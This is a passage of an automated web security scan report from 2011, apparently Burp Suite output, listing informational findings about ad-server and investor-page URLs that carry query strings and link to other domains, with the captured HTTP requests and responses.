http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mercantila.com/%26hl%3Den%26client%3Dca-pub-7603215072684732%26adU%3DWalmart.com%26adT%3DPatio%2Bat%2BWalmart%25C2%25AE%26adU%3Djcpenney.com%26adT%3DBeds%2Bat%2BJCPenney%26adU%3DFreshDeals.com%26adT%3D60%2525%2BOff%2BPatio%2BFurniture%26adU%3DInsideUp.com/Business-VoIP-Service%26adT%3DCompare%2BBusiness%2BVoIP%26gl%3DUS&usg=AFQjCNFMufcLhURQjjsyLWJ1TmXr5U5nHA

Request

GET /pagead/ads?client=ca-pub-7603215072684732&output=html&h=90&slotname=7539052272&w=728&lmt=1301695343&flash=10.2.154&url=http%3A%2F%2Fwww.mercantila.com%2F&dt=1301677343860&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=2626477342&correlator=1301677342699&frm=0&adk=1973868674&ga_vid=789951021.1301677343&ga_sid=1301677343&ga_hid=1915206547&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=961&fu=0&ifi=2&dtd=12&xpc=KUiBBGitGB&p=http%3A//www.mercantila.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 17:01:47 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 13694
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#457cb0;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mercantila.com/%26hl%3Den%26client%3Dca-pub-7603215072684732%26adU%3DWalmart.com%26adT%3DPatio%2Bat%2BWalmart%25C2%25AE%26adU%3Djcpenney.com%26adT%3DBeds%2Bat%2BJCPenney%26adU%3DFreshDeals.com%26adT%3D60%2525%2BOff%2BPatio%2BFurniture%26adU%3DInsideUp.com/Business-VoIP-Service%26adT%3DCompare%2BBusiness%2BVoIP%26gl%3DUS&usg=AFQjCNFMufcLhURQjjsyLWJ1TmXr5U5nHA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

11.10. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:11:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 1680
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D"></script>
...[SNIP]...

11.11. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D

The response contains the following link to another domain:

http://redcated/ADO/view/278612728/direct;wi.1;hi.1/01

Request

GET /ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzoh^Cqhjkv(+'n*Ar?/j9C?^6hwKS-6T#`5PBojYbRuf<Ll1I1_hYMhYeh%G6vYp*t5ODvAzTZ@iISJjXDc'nh[thoDjVDOn>OkjdhM-]kxuVc<-j^0E[S._]n?/-AkZL.5?T2G#A#U]+VwBupzlO^jt'sib/l$cNheGq(khOe'bw8d`euB.cj?qbq-gA!pj6^1%-h#Y:>8>-aA1s%>+2VKHUo:D4$wXYcPJa0pV6(yoKtkH4iSC7Y0![RCC#S9MDO7fT+LqQ2Bn!Cm+LoEJ1Rj9dTlZBSd-<H%U!v%'=cs)G=s5$$Fuh<-Uuf/c-H3lH#jqd6Oap3Jn<XaPzn`'kW8x490>]R9YwPWP84i@Tft^.$7hboq>5:RM_$2tI+t4y?]Wh$S3mfg$(rmoM+#rsOr%N_18#>u)Ad68T3rF<u@3GoUxqQuHeiMw`Mqgp3o`Lp^?sA:$+jr?'sLsp$GL52tA2rb_L7O9%tUm:mmr=Ma5rfGjl=`EA9k>54kg-mIfrsmD+)e>dAw+wgM1Z6.B++zP/-x-<YUx13AHx9m9EVCQ[0t>Lec_mi9=M5ckg9If?r2d=YvFi3W?kOv*'yK4EBNS-X-8(dO4`JtpvlG@^Em+X<s'_Bt4b*wzi%NN%0Y)2hh5+<oT@8?Dc@POarr%:v7cD'2OHF=bSuBlUCX?Nxf8N^Nh4>i5l%cKbE6+*6BP+`-(g2TYeYWq2wwO<::r`4Y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 01 Apr 2011 18:11:05 GMT
Content-Length: 1430

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAA
...[SNIP]...
</noscript>\n');document.write('<img src="http://view.atdmt.com/ADO/view/278612728/direct;wi.1;hi.1/01" width="1" height="1"/>');

11.12. http://investor.infospaceinc.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.infospaceinc.com
Path:	/phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

http://investor.infospaceinc.com/phoenix.zhtml?c=119056&p=irol-faq

The response contains the following links to other domains:

http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif
http://media.corporate-ir.net/media_files/irol/11/119056/clearpixel.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_head_invest_faq.jpg
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_icon_print.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_botrght_crnr.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_btlft_crnr.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_tplft_crnr.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_tprght_crnr.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_business_a.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_careers_a.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_consumerprods_a.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_investor_a.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_logo.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_ourstory_a.gif
http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_pressroom_a.gif
http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif
http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif
http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://tbe.taleo.net/NA2/ats/careers/jobSearch.jsp?org=INFOSPACE&cws=1

Request

GET /phoenix.zhtml?c=119056&p=irol-faq HTTP/1.1
Host: investor.infospaceinc.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/ourstory/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=158734690.1301677345.1.1.utmcsr=dogpile.com|utmccn=(referral)|utmcmd=referral|utmcct=/dogpile_rss/ws/about/_iceUrlFlag=11; __utma=158734690.1948383070.1301677345.1301677345.1301677345.1; __utmc=158734690; __utmb=158734690.1.10.1301677345

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 29281
Cache-Control: private, max-age=32
Date: Fri, 01 Apr 2011 17:01:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD40LzEvMjAxMSAxMjo1OTo0OCBQTTwvdGltZV
...[SNIP]...
<link rel="stylesheet" type="text/css" href="client/11/119056/css/ccbnIR.css" /><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<a href="http://infospaceinc.com"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_logo.gif" width="102" height="110" border="0" alt="InfoSpace" title="InfoSpace" /></a>
...[SNIP]...
<a href="http://infospaceinc.com/ourstory/default.aspx" target="_self" onmouseover="showMenu(1)" onmouseout="startMenuTimer(1)"><img name="menuImage1" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_ourstory_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_ourstory_b.gif', '/ourstory/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_ourstory_a.gif', '/ourstory/');" width="79" height="33" title="Our Story" alt="Our Story" border="0" /></a>
...[SNIP]...
<a href="http://infospaceinc.com/consumerprod/default.aspx" target="_self" onmouseover="showMenu(2)" onmouseout="startMenuTimer(1)"><img name="menuImage2" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_consumerprods_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_consumerprods_b.gif', '/consumerprod/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_consumerprods_a.gif', '/consumerprod/');" width="141" height="33" title="Consumer Products" alt="Consumer Products" border="0" /></a>
...[SNIP]...
<a href="http://infospaceinc.com/business/default.aspx" target="_self" onmouseover="showMenu(3)" onmouseout="startMenuTimer(1)"><img name="menuImage3" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_business_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_business_b.gif', '/business/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_business_a.gif', '/business/');" width="130" height="33" title="Business Solutions" alt="Business Solutions" border="0" /></a>
...[SNIP]...
<a href="phoenix.zhtml?c=119056&p=irol-irhome" target="_self" onmouseover="showMenu(4)" onmouseout="startMenuTimer(1)"><img name="menuImage4" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_investor_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_investor_b.gif', '/investorcenter/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_investor_a.gif', '/investorcenter/');" width="115" height="33" title="Investor Center" alt="Investor Center" border="0" /></a>
...[SNIP]...
<a href="phoenix.zhtml?c=119056&p=irol-newspress&nyo=0" target="_self" onmouseover="showMenu(5)" onmouseout="startMenuTimer(1)"><img name="menuImage5" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_pressroom_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_pressroom_b.gif', '/pressroom/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_pressroom_a.gif', '/pressroom/');" width="88" height="33" title="Press Room" alt="Press Room" border="0" /></a>
...[SNIP]...
<a href="http://infospaceinc.com/careers/default.aspx" target="_self" onmouseover="showMenu(6)" onmouseout="startMenuTimer(1)"><img name="menuImage6" src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_careers_a.gif" onmouseover="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_careers_b.gif', '/careers/');" onmouseout="imgRoll(this, 'http://media.corporate-ir.net/media_files/irol/11/119056/infospace_top_careers_a.gif', '/careers/');" width="69" height="33" title="Careers" alt="Careers" border="0" /></a>
...[SNIP]...
<li><a href="http://tbe.taleo.net/NA2/ats/careers/jobSearch.jsp?org=INFOSPACE&cws=1" class="tm">Available Positions</a>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="phoenix.zhtml?c=119056&p=irol-faq_pf"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_icon_print.gif" alt="Print Page" border="0" /></a>
...[SNIP]...
<div class="template_content_top"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_head_invest_faq.jpg" alt="" width="745" border="0" height="126" /></div>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
R0cDovL2ludmVzdG9yLmluZm9zcGFjZWluYy5jb20vcGhvZW5peC56aHRtbD9jPTExOTA1NiZwPWlyb2wtZmFx" onclick="window.open(this.href,'','scrollbars=no,status=no,width=450,height=500');return false;" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif" alt="E-mail Page" border="0" /></a>
...[SNIP]...
<A HREF="phoenix.zhtml?c=119056&p=rssSubscription&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif" border="0" alt="RSS Feeds" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=119056&p=irol-alerts&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif" border="0" alt="E-mail Alerts" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=119056&p=irol-contact&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif" border="0" alt="IR Contacts" /></A>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="Tearsheet.ashx?c=119056"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif" border="0" alt="Financial Tear Sheet" /></a>
...[SNIP]...
